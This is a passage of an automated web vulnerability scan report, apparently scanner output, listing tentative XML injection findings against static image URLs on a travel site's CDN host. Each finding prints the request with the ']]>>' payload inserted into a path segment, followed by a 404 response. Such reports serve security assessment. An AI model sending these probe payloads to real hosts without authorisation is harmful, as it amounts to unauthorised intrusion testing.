Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:55 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.113. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/car_icon.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/car_icon.jpg?ver=222796 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:58 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.114. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/car_icon.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/car_icon.jpg?ver=222796 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.115. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/car_icon.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/car_icon.jpg?ver=222796 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535948
Date: Mon, 03 Oct 2011 01:02:08 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.116. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/car_icon.jpg

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/car_icon.jpg]]>>?ver=222796 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:13 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.117. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:20 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.118. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:23 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.119. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/img-bottom-curved-corners-with-opaque-gradient.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:27 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.120. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/img-bottom-curved-corners-with-opaque-gradient.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:31 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.121. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:33 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.122. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-curved-corners.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/img-bottom-curved-corners.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:56 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.123. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-curved-corners.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/img-bottom-curved-corners.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:59 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.124. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-curved-corners.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/img-bottom-curved-corners.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:04 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.125. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-curved-corners.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/img-bottom-curved-corners.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535993
Date: Mon, 03 Oct 2011 01:02:07 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.126. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-curved-corners.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/img-bottom-curved-corners.png]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:10 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.127. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-gradient-for-details-sections.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/img-bottom-gradient-for-details-sections.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:24 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.128. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-gradient-for-details-sections.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/img-bottom-gradient-for-details-sections.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535974
Date: Mon, 03 Oct 2011 01:02:30 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.129. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-gradient-for-details-sections.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/img-bottom-gradient-for-details-sections.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
